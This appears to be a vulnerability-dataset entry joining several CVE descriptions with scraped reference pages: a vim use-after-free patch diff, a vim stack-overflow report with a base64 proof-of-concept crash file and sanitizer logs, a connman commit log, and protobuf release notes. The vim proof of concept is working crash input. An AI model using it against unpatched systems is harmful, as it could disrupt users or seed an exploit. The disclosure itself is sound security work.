Use After Free in GitHub repository vim/vim prior to 8.2.

@@ -3687,6 +3687,7 @@ ex\_substitute(exarg\_T \*eap) int save\_do\_all; // remember user specified 'g' flag int save\_do\_ask; // remember user specified 'c' flag char\_u \*pat = NULL, \*sub = NULL; // init for GCC char\_u \*sub\_copy = NULL; int delimiter; int sublen; int got\_quit = FALSE; @@ -3980,11 +3981,20 @@ ex\_substitute(exarg\_T \*eap) sub\_firstline = NULL;  
/\* \* ~ in the substitute pattern is replaced with the old pattern. \* We do it here once to avoid it to be replaced over and over again. \* But don't do it when it starts with "\\=", then it's an expression. \* If the substitute pattern starts with "\\=" then it's an expression. \* Make a copy, a recursive function may free it. \* Otherwise, '~' in the substitute pattern is replaced with the old \* pattern. We do it here once to avoid it to be replaced over and over \* again. \*/ if (!(sub\[0\] == '\\\\' && sub\[1\] == '\=')) if (sub\[0\] == '\\\\' && sub\[1\] == '\=') { sub = vim\_strsave(sub); if (sub == NULL) return; sub\_copy = sub; } else sub = regtilde(sub, magic\_isset());  
/\* @@ -4790,6 +4800,7 @@ ex\_substitute(exarg\_T \*eap) #endif  
vim\_regfree(regmatch.regprog); vim\_free(sub\_copy);  
// Restore the flag values, they can be used for ":&&". subflags.do\_all = save\_do\_all;

CVE-2022-0413: patch 8.2.4253: using freed memory when substitute with function call · vim/vim@37f4795

Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

Stack overflow occurs in spellsuggest.c.

commit : 44db8213d38c39877d2148eff6a72f4beccfb94e

**Proof of Concept**

    $ echo -ne "bm9ybRZzMDAwRzAw/TAwMDAwMDAwMDAwMApzaWwwbm9ybS4udnpHLi4uLi4uLi4uLi4uLi4uLnZ2
    ekcwICAgICB2IHo9" | base64 -d > minimized_poc
    
    # Valgrind
    $ ./vg-in-place -s ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!"
    ==596658== Memcheck, a memory error detector
    ==596658== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==596658== Using Valgrind-3.19.0.GIT and LibVEX; rerun with -h for copyright info
    ==596658== Command: ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c :qa!
    ==596658==
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658==
    ==596658== Process terminating with default action of signal 11 (SIGSEGV): dumping core
    ==596658==    at 0x4A2255B: kill (syscall-template.S:78)
    ==596658==    by 0x28FE98: may_core_dump (os_unix.c:3510)
    ==596658==    by 0x28FE4C: mch_exit (os_unix.c:3476)
    ==596658==    by 0x40A260: getout (main.c:1721)
    ==596658==    by 0x25302D: preserve_exit (misc1.c:2194)
    ==596658==    by 0x28E408: deathtrap (os_unix.c:1156)
    ==596658==    by 0x4A2220F: ??? (in /usr/lib/x86_64-linux-gnu/libc-2.31.so)
    ==596658==    by 0x32FCBC: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==
    ==596658== HEAP SUMMARY:
    ==596658==     in use at exit: 114,315 bytes in 593 blocks
    ==596658==   total heap usage: 1,864 allocs, 1,271 frees, 1,057,411 bytes allocated
    ==596658==
    ==596658== LEAK SUMMARY:
    ==596658==    definitely lost: 1,679 bytes in 6 blocks
    ==596658==    indirectly lost: 8 bytes in 3 blocks
    ==596658==      possibly lost: 268 bytes in 1 blocks
    ==596658==    still reachable: 112,360 bytes in 583 blocks
    ==596658==         suppressed: 0 bytes in 0 blocks
    ==596658== Rerun with --leak-check=full to see details of leaked memory
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    ==596658==
    ==596658== 1 errors in context 1 of 1:
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    Segmentation fault
    
    # ASAN
    $ ~/fuzzing/vim-asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S ~/fuzzing/valgrind/minimized_poc ":qa!"
    =================================================================
    ==250851==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff6b20 at pc 0x000000496710 bp 0x7fffffff3d10 sp 0x7fffffff34d8
    WRITE of size 32 at 0x7fffffff6b20 thread T0
        #0 0x49670f in __asan_memcpy (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f)
        #1 0xb08866 in go_deeper /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:2664:24
        #2 0xb08866 in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1766:4
        #3 0xafa3e1 in suggest_try_change /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1199:2
        #4 0xafa3e1 in spell_suggest_intern /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:995:5
        #5 0xafa3e1 in spell_find_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:870:6
        #6 0xaf6ffd in spell_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:545:5
        #7 0x894d7b in nv_zet /home/alkyne/fuzzing/vim-asan/src/normal.c:3398:7
        #8 0x864da8 in normal_cmd /home/alkyne/fuzzing/vim-asan/src/normal.c:1238:5
        #9 0x6a1a76 in exec_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c
        #10 0x6a0bb1 in exec_normal_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8592:5
        #11 0x6a0bb1 in ex_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8510:6
        #12 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #13 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #14 0xa71d9d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
        #15 0xa7042d in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
        #16 0xa7042d in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
        #17 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #18 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #19 0xd97b27 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3091:2
        #20 0xd97b27 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
        #21 0xd95139 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
        #22 0x7ffff7c260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41eacd in _start (/home/alkyne/fuzzing/vim-asan/src/vim+0x41eacd)
    
    Address 0x7fffffff6b20 is located in stack of thread T0 at offset 11776 in frame
        #0 0xb01cbf in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1247
    
      This frame has 11 object(s):
        [32, 152) 'stack.i.i.i' (line 4307)
        [192, 200) 'p.i.i.i' (line 4316)
        [224, 1240) 'wbadword.i.i.i' (line 4317)
        [1376, 2392) 'wgoodword.i.i.i' (line 4318)
        [2528, 2648) 'stack.i.i' (line 4132)
        [2688, 2942) 'theword.i' (line 3169)
        [3008, 3262) 'cword.i' (line 3267)
        [3328, 3582) 'tword' (line 1248)
        [3648, 11776) 'stack' (line 1249) <== Memory access at offset 11776 overflows this variable
        [12032, 12794) 'preword' (line 1250)
        [12928, 13182) 'compflags' (line 1255)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f) in __asan_memcpy
    Shadow bytes around the buggy address:
      0x10007fff6d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff6d60: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d70: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==250851==ABORTING
    

**Impact**

Stack bof may lead to exploit the program.

CVE-2022-0408: Stack-based Buffer Overflow in vim

An issue was discovered in the DNS proxy in Connman through 1.40. The TCP server reply implementation has an infinite loop if no data is received.

AgeCommit message (Expand)AuthorFilesLines 12 dayswispr: Simplify the IP version checkHEADmasterDaniel Wagner1\-5/+1 12 dayswispr: Fix context refcounting in wispr\_portal\_request\_portal()Daniel Wagner1\-5/+5 12 daysservice: Track online check for IPv4 and IPv6 separatelyDaniel Wagner1\-12/+27 2022-08-28ipconfig: Don't add invalid gateway routesDaniel Wagner1\-1/+1 2022-08-28wisrp: Handle wispr\_portal\_detect failuresDaniel Wagner1\-24/+32 2022-08-28resolver: Add path to resolv.conf to config optionsJakub Jirutka3\-7/+48 2022-08-01AUTHORS: Mention Nathan's contributionsDaniel Wagner1\-0/+1 2022-08-01gweb: Fix OOB write in received\_data()Nathan Crandall1\-1/+1 2022-08-01wispr: Update portal context referencesDaniel Wagner1\-12/+22 2022-08-01wispr: Add reference counter to portal contextDaniel Wagner1\-10/+42 2022-08-01wispr: Ignore NULL proxyDaniel Wagner1\-1/+1 2022-08-01wispr: Rename wispr\_portal\_list to wispr\_portal\_hashDaniel Wagner1\-11/+11 2022-05-25wispr: Prevent use-after-free from \_\_connman\_wispr\_stop()Seung-Woo Kim1\-11/+5 2022-05-25doc: Add note SingleConnectedTechnology can't be used with VPNDaniel Wagner1\-1/+2 2022-05-16service: Add "Ethernet" property for VPN into n.c.Manager GetServicesJakub Jirutka1\-1/+1 2022-05-16clock: fix time update transition auto->manualRyan Smith1\-6/+3 2022-04-14wispr: Fix online check when using WPAD/PACRyan Smith1\-6/+30 2022-04-14dhcp: Set proxy properly when applying DHCP leaseRyan Smith1\-2/+1 2022-04-14gdhcp: fix server address byte orderRyan Smith1\-1/+1 2022-04-14iwd: Fix connection with invalid passphrase formatEmmanuel VAUTRIN1\-1/+3 2022-04-08AUTHORS: Mention Daniel's contributionsDaniel Wagner1\-0/+1 2022-04-08vpn: Replace hardcoded paths with RUNSTATEDIRDaniel Linjama2\-3/+3 2022-04-08build: Support configurable run dir with RUNSTATEDIRDaniel Linjama2\-0/+3 2022-04-08ofono: Do not change regdom when it follows timezoneJussi Laakkonen1\-0/+5 2022-04-08timezone: Change regdom along timezone, use localtime configJussi Laakkonen1\-5/+100 2022-04-08main: Add RegdomFollowsTimezone option for regdom changesJussi Laakkonen2\-0/+19 2022-04-08main: Add path to localtime to config options.Jussi Laakkonen2\-0/+22 2022-04-08timeserver: include the reason why a timeserver sync is requestedNicky Geerts4\-7/+35 2022-03-07timeserver: refresh the nameservers before each lookupNicky Geerts1\-41/+46 2022-03-04iwd: Forget network on service removalEmmanuel VAUTRIN5\-0/+58 2022-03-04dnsproxy: add standalone test version of dnsproxy and a test script for itMatthias Gerstner4\-1/+284 2022-02-27service: Check if hidden service has a pending request on agentJussi Laakkonen1\-1/+4 2022-02-27agent: Add support to check for active pending requestsJussi Laakkonen4\-0/+39 2022-02-27AUTHORS: Mention Sebastian's contributionsDaniel Wagner1\-0/+1 2022-02-27vpn/vpn-polkit.policy: Replace unsupported "auth\_\*\_keep\_session" by "auth\_\*\_k...Sebastian Pipping1\-2/+2 2022-02-27iwd: Fix disabling tethering not working for brcmfmacJonathan Liu1\-5/+4 2022-02-27main: Set default online check URL also when no config providedDaniel Wagner1\-2/+8 2022-02-21dnsproxy-test: support command line specification of dnsproxy portMatthias Gerstner1\-2/+9 2022-02-21dnsproxy: support programmatic configuration of the default listen portMatthias Gerstner2\-2/+9 2022-02-21.gitignore: also ignore emacs backup filesMatthias Gerstner1\-0/+1 2022-02-21dnsproxy: protocol\_offset: remove error return case and return size\_tMatthias Gerstner1\-27/+14 2022-02-21dnsproxy: remove unnecessarily shadowed variableMatthias Gerstner1\-1/+1 2022-02-21dnsproxy: remove unused domain parameter from \`remove\_server()\`Matthias Gerstner1\-4/+3 2022-02-21iwd: Use same signal strength calculation as wpa\_supplicantJonathan Liu1\-1/+3 2022-02-21iwd: Fix typo in warning message when enabling AccessPoint modeJonathan Liu1\-1/+1 2022-02-21wifi: Duplicate GSupplicantSSID pointer membersNiel Fourie2\-39/+83 2022-01-28Release 1.411.41Marcel Holtmann2\-1/+9 2022-01-25unit: Fix missing declarations in test-iptablesEmmanuel VAUTRIN1\-2/+2 2022-01-25AUTHORS: Add Matthias' contributionsDaniel Wagner1\-0/+1 2022-01-25dnsproxy: Keep timeout in TCP case even after connection is establishedMatthias Gerstner1\-5/+0 2022-01-25dnsproxy: Avoid 100 % busy loop in TCP server caseMatthias Gerstner1\-0/+12 2022-01-25dnsproxy: Validate input data before using themDaniel Wagner1\-5/+26 2022-01-25dnsproxy: Update TCP length headerMatthias Gerstner1\-0/+3 2022-01-25main: Use g\_strdup for online\_check\_ipv{4,6}\_url configDaniel Wagner1\-2/+9 2022-01-23service: Fix native connection with wrong passphraseEmmanuel VAUTRIN1\-0/+9 2022-01-21iwd: Mark only reachable networks as availableEmmanuel VAUTRIN1\-1/+3 2022-01-21iwd: Fix connection with no passphraseEmmanuel VAUTRIN1\-0/+2 2022-01-21iwd: Fix station in scan callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-12-19AUTHORS: Mention Christian's contributionsDaniel Wagner1\-0/+1 2021-12-19ipconfig: Do not enable/disable ipv6 for all ifsChristian Taedcke1\-0/+6 2021-12-19Add ObjectManager interface to connmanMichael Trimarchi1\-1/+1 2021-11-18service: Support hot-plug of technologies by updating ipconfig indexJussi Laakkonen1\-2/+15 2021-11-18openvpn: Improve configuration value processingJussi Laakkonen1\-44/+76 2021-11-18vpn-provider: Support checking if provider setting key exists.Jussi Laakkonen2\-0/+8 2021-10-26tether: Fix connman\_technology\_get\_wifi\_tetheringMichael Trimarchi1\-2/+6 2021-10-20dnsproxy: Fix uninitialized false positive in dnsproxyEmmanuel VAUTRIN1\-1/+1 2021-10-20tools: Fix uninitialized errors in iptables testsEmmanuel VAUTRIN2\-2/+2 2021-10-20config: Cleanup of iwd provision\_service\_wifi()Emmanuel VAUTRIN1\-4/+2 2021-10-15gsupplicant: Fix error return typeDaniel Wagner1\-2/+2 2021-10-15inet: Remove unused ipv6\_addr\_advert\_multDaniel Wagner1\-7/+0 2021-10-15build: Only enable -Wcast-align for gccDaniel Wagner1\-1/+3 2021-10-15client: Update the connmactl to support optional tethering channelMichael Trimarchi1\-14/+46 2021-10-15tethering: Add TetheringFreq parameter documentationMichael Trimarchi1\-0/+7 2021-10-15tethering: Add possibility to configure the access point frequencyMichael Trimarchi5\-7/+52 2021-10-15tethering: Reduce the number of parameters of tech\_set\_tetheringMichael Trimarchi8\-32/+33 2021-10-04AUTHORS: Mention Michael's contributionsDaniel Wagner1\-0/+1 2021-10-04manager: Add TetheringClientsChanged GBUS\_SIGNALMichael Trimarchi1\-0/+3 2021-10-04service: Report errors to user in native modeVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-10-04iwd: Fix timeout error on new connectionVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-10-04iwd: Fix improper IPv4/6 attributes when disconnectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+2 2021-10-04iwd: Fix missing Ethernet attributesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+8 2021-09-13doc: Document AuthErrorLimit in VPN connection APIJussi Laakkonen1\-0/+13 2021-09-13openvpn: Default to 10 AuthErrorLimit unless set by userJussi Laakkonen1\-0/+9 2021-09-13vpn-provider: Add auth error check heuristic to avoid losing credsJussi Laakkonen2\-0/+112 2021-09-13vpn-provider: Ignore error adding when state is idle/unknownJussi Laakkonen1\-0/+15 2021-09-13vpn: Report EALREADY back to caller if VPN is already disconnectingJussi Laakkonen1\-1/+2 2021-09-13gsupplicant: Add support for WPA3-Personal transition modeAriel D'Alessandro1\-10/+19 2021-08-31doc: Add new openconnect input fieldsLukáš Karas1\-0/+13 2021-08-30openconnect: Add support for 2nd passwordLukáš Karas2\-2/+85 2021-08-30vpn: Refactor connect\_reply() and handle NoCarrier -> ENOLINK errorJussi Laakkonen1\-2/+12 2021-08-30vpn-provider: Implement connmand online state checkingJussi Laakkonen1\-1/+356 2021-08-30service: Do not trigger wispr start when EnableOnlineCheck is disabledDaniel Wagner1\-0/+6 2021-08-30service: Move wispr start code into helperDaniel Wagner1\-16/+15 2021-08-29network: Do not disconnect decice on network connectDaniel Wagner1\-2/+0 2021-08-29service: Prevent auto connection during passphrase requestVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+25 2021-08-29wispr: Add online check url config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-15/+68 2021-08-29service: Fix default service update on ready stateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+2 2021-08-29service: Ignore state information in service reorderingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+1 2021-08-17pptp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-43/+84 2021-08-17l2tp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-40/+75 2021-08-17l2tp: Create control file for xl2tpdMatt Vogt1\-2/+16 2021-07-28gdhcp: Do not process missing DHCP\_SERVER\_ID fieldsDaniel Wagner1\-0/+5 2021-07-26service: service\_update\_preferred\_order cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-17/+5 2021-07-20AUTHORS: Fix Rahul's email addressDaniel Wagner1\-1/+1 2021-07-20main: Fix a memory leak for str\_list in parse\_configRahul Jain1\-0/+2 2021-07-02service: apply\_relevant\_default\_downgrade cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+3 2021-07-02service: Let PreferredTechnologies overrule connected service sortingDaniel Wagner1\-13/+27 2021-06-30agent: Always inform upper layer via callbackDaniel Wagner1\-1/+1 2021-06-23service: Ask for password when using native autoconnectDaniel Wagner1\-1/+2 2021-06-23iwd: Do not try to handle out of memory failsDaniel Wagner1\-38/+6 2021-06-23vpn-rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-23rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-21README: Add IRC channel infoDaniel Wagner1\-0/+4 2021-06-21AUTHORS: Mention Lukáš' contributionsDaniel Wagner1\-0/+1 2021-06-21dnsproxy: Replace strncopy by memcpyLukáš Karas1\-1/+1 2021-06-14AUTHORS: Mention Ariel's contributionsDaniel Wagner1\-0/+1 2021-06-14wifi: Add wpa\_supplicant WPA3-SAE supportAriel D'Alessandro3\-3/+57 2021-06-10Release 1.401.40Marcel Holtmann2\-1/+6 2021-06-09AUTHORS: Mention Alyssa's contributionsDaniel Wagner1\-0/+1 2021-06-09README: fix typoAlyssa Ross1\-1/+1 2021-06-07AUTHORS: Mention Valery's contributionsDaniel Wagner1\-0/+1 2021-06-07dnsproxy: Check the length of buffers before memcpyValery Kashcheev1\-9/+11 2021-06-02README: Update mailing list infoDaniel Wagner1\-2/+8 2021-05-14README: Remove the 01.org website and the 01.org JiraMarcel Holtmann1\-5/+1 2021-05-13main: Cleanup of vendor class id and wifi config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)7\-46/+10 2021-05-05wispr: Support of common redirection status codesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+5 2021-04-27timerserver: Fix time update manual->autoDaniel Wagner1\-2/+2 2021-04-25service: Disable native autoconnect calls for providersDaniel Wagner1\-2/+2 2021-04-18peer: Open code g\_memdupDaniel Wagner1\-1/+4 2021-04-18wifi: Open code g\_memdupDaniel Wagner1\-7/+18 2021-04-18Rewrite openconnect plugin to use libopenconnectSanttu Lakkala3\-382/+525 2021-04-18service: Teach autoconnect algorithm native modeDaniel Wagner2\-29/+56 2021-04-18network: Add \_\_connman\_network\_native\_autoconnect()Daniel Wagner2\-0/+8 2021-04-18iwd: Filter out connect failure for auto connect modeDaniel Wagner1\-1/+1 2021-04-18iwd: Init AutoConnect of know networksDaniel Wagner1\-0/+26 2021-04-18service: Factor auto connect trigger code into a new functionDaniel Wagner1\-34/+40 2021-04-18service: Remove unused \_\_connman\_service\_disconnect\_all()Daniel Wagner2\-31/+0 2021-04-05wireguard: Copy interfance names obeying lengths rulesDaniel Wagner1\-1/+1 2021-04-05ethernet: Copy interfance names obeying lengths rulesDaniel Wagner1\-5/+7 2021-04-05ipconfig: Refactor /proc value get/set to separate functionsJussi Laakkonen1\-85/+97 2021-04-05service: Sort VPNs using the transport service if connectedJussi Laakkonen1\-0/+45 2021-04-05provider: Add function to get transport ident from VPNJussi Laakkonen2\-0/+11 2021-04-05vpn: Return transport ident with get\_property()Jussi Laakkonen1\-7/+15 2021-03-27dnsproxy: Enable DNS servers on connected VPN if split routing changesJussi Laakkonen1\-0/+11 2021-03-27timeserver: Fix false error messageJustin Maggard1\-1/+1 2021-03-27iwd: Fix typo in error message when stopping AccessPoint modeJonathan Liu1\-1/+1 2021-03-27service: Allow only user connection after WiFi failureVAUTRIN Emmanuel (Canal Plus Prestataire)1\-4/+10 2021-03-27service: Fix disconnection search before connectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-03-27service: Complete only after user connection retriesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+3 2021-03-27mailmap: Update non-canonical log entriesDaniel Wagner1\-0/+3 2021-02-24service: Add online to ready transition featureEmmanuel VAUTRIN6\-13/+78 2021-02-22service: Fix integer type for online check intervalDaniel Wagner1\-3/+3 2021-02-15service: Add online check interval config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-19/+88 2021-02-15wifi: Reset disconnecting status of any networkVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-10wifi: Check valid network in disconnect callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-08Release 1.391.39Marcel Holtmann2\-1/+7 2021-02-05AUTHORS: Mention Colin's contributionsDaniel Wagner1\-0/+1 2021-02-05dnsproxy: Add length checks to prevent buffer overflowColin Wee1\-3/+11 2021-02-05gdhcp: Avoid leaking stack data via unitiialized variableColin Wee1\-1/+1 2021-02-05gdhcp: Avoid reading invalid data in dhcp\_get\_optionColin Wee4\-20/+38 2021-02-05service: Restart online check when default service changesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+10 2021-02-05timeserver: Reset time sync on system timeserver updateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-05clock: Add TimeSynced signal emitted when the system time has been syncedVAUTRIN Emmanuel (Canal Plus Prestataire)4\-1/+67 2021-01-25AUTHORS: Mention Gabriel's contributionsDaniel Wagner1\-0/+1 2021-01-25wifi: Always disconnect connection completelyGabriel FORTE1\-8/+37 2020-12-28timeserver: Split new service and configuration updateDaniel Wagner3\-27/+33 2020-12-28services: Escape passphrase stringDaniel Wagner2\-7/+17 2020-12-23wifi: Base BSS expiration age on long scanning intervalEmmanuel VAUTRIN1\-0/+21 2020-12-22wifi: Fix wireless interface not being added to tether bridge sometimesJonathan Liu1\-4/+5 2020-12-22openvpn: Update documemtation for --protoDaniel Wagner1\-1/+1 2020-12-22vpnc: Do not lose credentials with VPN agent timeoutsJussi Laakkonen1\-6/+15 2020-12-14vpn: Export vpn\_ipconfig\_foreach as linker symbolDaniel Wagner4\-4/+4 2020-12-14vpn: Do not do mixed declerations and codeDaniel Wagner1\-18/+14 2020-12-14src: Test return value of inet\_pton consistentlyDaniel Wagner5\-17/+17 2020-12-11doc: Document VPN connection SplitRouting booleanJussi Laakkonen1\-1/+8 2020-12-11vpn-provider: Support SplitRouting option from connmandJussi Laakkonen1\-21/+158 2020-12-11vpn-provider: Drop route management from vpndJussi Laakkonen5\-100/+13 2020-12-11vpn-config: Implement function to get boolean from keyfileJussi Laakkonen2\-4/+21 2020-12-11vpn: Support SplitRouting in D-Bus variables, improve route codeJussi Laakkonen1\-20/+207 2020-12-11provider: Add support for managing SplitRoutingJussi Laakkonen2\-0/+105 2020-12-11service: Load and apply service settings after D-Bus registrationJussi Laakkonen1\-3/+3 2020-12-11service: Add property changed signal for SplitRouting valueJussi Laakkonen2\-0/+25 2020-12-11service: Expose set\_split\_routing() for internal useJussi Laakkonen2\-10/+15 2020-12-11service: Split service move functionality for internal useJussi Laakkonen2\-16/+46 2020-12-11dbus: Report back the return value of g\_dbus\_send\_message()Jussi Laakkonen1\-18/+6 2020-12-11inet: Do not add broadcast address for P2P/VPNsJussi Laakkonen20\-36/+123 2020-12-11inet: Refactor with getifaddrs() and add network route getter functionJussi Laakkonen2\-243/+326 2020-12-11inet: Add function for detecting a default routeJussi Laakkonen2\-0/+17 2020-12-11connection: Add getter for the phy index of a VPN transport serviceJussi Laakkonen2\-0/+24 2020-12-11wispr: check service before stopping portal detectionSergey Matyukevich1\-1/+17 2020-12-11AUTHORS: Mention Boleslaw's contributionsDaniel Wagner1\-0/+1 2020-12-11neard: Fix memory leaks with PendingCallBoleslaw Tokarski1\-1/+1 2020-12-11vpn: Fix memory leaks with PendingCallBoleslaw Tokarski1\-11/+30 2020-12-11vpn: Secure a race condition with flagBoleslaw Tokarski1\-2/+8 2020-12-11Revert "gdhcp: Make DHCP client timeouts suspend aware"Daniel Wagner2\-134/+52 2020-12-04vpn-provider: Cancel agent requests when removing VPNJussi Laakkonen1\-0/+6 2020-12-04AUTHORS: Mention Emmanuel's contributionsDaniel Wagner1\-0/+1 2020-12-04services: Return error for invalid hidden namesEmmanuel Vautrin1\-8/+12 2020-12-04AUTHORS: Mention Pieter's contributionsDaniel Wagner1\-0/+1 2020-12-04rtnl: Mark dsa interfaces as ethernet typePieter Cardoen1\-0/+3

CVE-2022-23098: connman/connman.git - Connection Manager

Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater.

**Protocol Compiler**

*   Optional fields for proto3 are enabled by default, and no longer require  
    the --experimental\_allow\_proto3\_optional flag.

**C++**

*   MessageDifferencer: fixed bug when using custom ignore with multiple  
    unknown fields
*   Use init\_seg in MSVC to push initialization to an earlier phase.
*   Runtime no longer triggers -Wsign-compare warnings.
*   Fixed -Wtautological-constant-out-of-range-compare warning.
*   DynamicCastToGenerated works for nullptr input for even if RTTI is disabled
*   Arena is refactored and optimized.
*   Clarified/specified that the exact value of Arena::SpaceAllocated() is an  
    implementation detail users must not rely on. It should not be used in  
    unit tests.
*   Change the signature of Any::PackFrom() to return false on error.
*   Add fast reflection getter API for strings.
*   Constant initialize the global message instances
*   Avoid potential for missed wakeup in UnknownFieldSet
*   Now Proto3 Oneof fields have "has" methods for checking their presence in  
    C++.
*   Bugfix for NVCC
*   Return early in \_InternalSerialize for empty maps.
*   Adding functionality for outputting map key values in proto path logging  
    output (does not affect comparison logic) and stop printing 'value' in the  
    path. The modified print functionality is in the  
    MessageDifferencer::StreamReporter.
*   Fixed #8129
*   Ensure that null char symbol, package and file names do not result in a  
    crash.
*   Constant initialize the global message instances
*   Pretty print 'max' instead of numeric values in reserved ranges.
*   Removed remaining instances of std::is\_pod, which is deprecated in C++20.
*   Changes to reduce code size for unknown field handling by making uncommon  
    cases out of line.
*   Fix std::is\_pod deprecated in C++20 (#7180)
*   Fix some -Wunused-parameter warnings (#8053)
*   Fix detecting file as directory on zOS issue #8051 (#8052)
*   Don't include sys/param.h for \_BYTE\_ORDER (#8106)
*   remove CMAKE\_THREAD\_LIBS\_INIT from pkgconfig CFLAGS (#8154)
*   Fix TextFormatMapTest.DynamicMessage issue#5136 (#8159)
